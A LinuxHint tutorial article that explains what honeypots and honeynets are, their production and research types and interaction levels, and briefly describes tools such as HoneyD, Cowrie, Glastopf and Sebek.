Honeypots and Honeynets

Part of the work of security IT specialists is to learn about the types of attacks, or techniques used by hackers by collecting, also, information for later analysis in order to evaluate the attack attempts characteristics. Sometimes this collection of information is done through a bait, or decoys designed to register suspicious activity of potential attackers who act without knowing their activity is being monitored. In IT security these baits or decoys are called Honeypots.

A honeypot may be an application simulating a target which is really a recorder of attackers’ activity. Multiple Honeypots simulating multiple services, devices and applications related are denominated Honeynets.

Honeypots and Honeynets don’t store sensitive information but store fake attractive information to attackers in order to get them interested in the Honeypots, Honeynets, in other words we are talking about hacker traps designed to learn their attack techniques.

Honeypots report us two types of benefits: first they help us to learn attacks to later secure our production device or network properly. Second, by keeping honeypots simulating vulnerabilities next to production devices or network, we keep hackers attention out of secured devices, since they will find more attractive the honeypots simulating security holes they can exploit.

There are different types of Honeypots:

Production Honeypots:

This type of honeypots is installed in a production network to collect information on techniques used to attack systems within the infrastructure.  This type of Honeypots offers a wide variety of possibilities, from the location of the honeypot within a specific network segment in order to detect internal attempts by network legitimate users to access unallowed or forbidden resources to a clone of a website or service, identical to the original as bait. The biggest issue of this type of honeypots is allowing malicious traffic between legitimate one.

Development honeypots:

This type of honeypots is designed to collect more information as possible on hacking trends, desired targets by attackers and attacks origins. This information is later analyzed for the decision-making process on security measures implementation.

The main advantage of this type of honeypots is, contrary to production honeypots development honeypots are located within an independent network, dedicated for research, this vulnerable system is separated from the production environment preventing an attack from the honeypot itself. Its main disadvantage is the quantity of resources necessary to implement it.

There is a 3 subcategory or different classification of honeypots defined by the interaction it has with attackers.

Low Interaction Honeypots:

A Honeypot emulates a vulnerable service, app or system.  This is very easy to setup but limited when collecting information, some examples of this type of honeypots are:

Honeytrap: it is designed to observe attacks against network services, contrary to other honeypots which focus on capturing malwares this type of honeypots is designed to capture exploits.

Nephentes: emulates known vulnerabilities in order to collect information on possible attacks, it is designed to emulate vulnerabilities worms exploits to propagate, then Nephentes captures their code for later analysis.

HoneyC: identifies malicious web servers within the networking by emulating different clients and collecting server responses when replying to requests.

HoneyD: is a daemon which creates virtual hosts within a network which can be configured to run arbitrary services simulating execution in different OS.

Glastopf: emulates thousands of vulnerabilities designed to collect attacks information against web applications. It is easy to setup and once indexed by search engines it becomes an attractive target to hackers.

Medium Interaction Honeypots:

These types of honeypots are less interactive than the previous without allowing the level interaction high honeypots allow. Some Honeypots of this type are:

Kippo: it is a ssh honeypot used to log brute force attacks against unix systems and log the activity of the hacker if the access was gained. It was discontinued and replaced by Cowrie.

Cowrie: another ssh and telnet honeypot which logs brute force attacks and hackers shell interaction. It emulates a Unix OS and works as proxy to log the attacker activity.

Sticky_elephant: it is a PostgreSQL honeypot.

Hornet: An improved version of honeypot-wasp with fake credentials prompt designed for websites with public access login page for administrators such as /wp-admin for wordpress sites. 

High Interaction Honeypots:

In this scenario Honeypots aren’t designed to collect information only, it is an application designed to interact with attackers while exhaustively registering the interaction activity, it simulates a target capable of offering all answers the attacker may expect, some honeypots of this type are:

Sebek: works in as a HIDS (Host-based Intrusion Detection System) allowing to capture information on a system activity. This is a server-client tool capable to deploy honeypots on Linux, Unix and Windows which capture and send the collected information to the server.

HoneyBow: can be integrated with low interaction honeypots to increase information collection.

HI-HAT (High Interaction Honeypot Analysis Toolkit): converts php files into high interaction honeypots with a web interface available to monitor the information.

Capture-HPC: similar to HoneyC, identifies malicious servers by interacting with them as clients using a dedicated virtual machine and registering unauthorized changes.

If you are interested in Honeypots probably IDS (Intrusion Detection Systems) may be interesting for you, at LinuxHint we have a couple of interesting tutorials about them:

I hope you found this article on Honeypots and Honeynets useful. Keep following LinuxHint for more tips and updates on Linux and security.

About the author

Ivan Vanney

Ivan Vanney

Ivan Vanney has over 2 years as writer for LinuxHint, he is co-founder of the freelance services marketplace where he works as a sysadmin.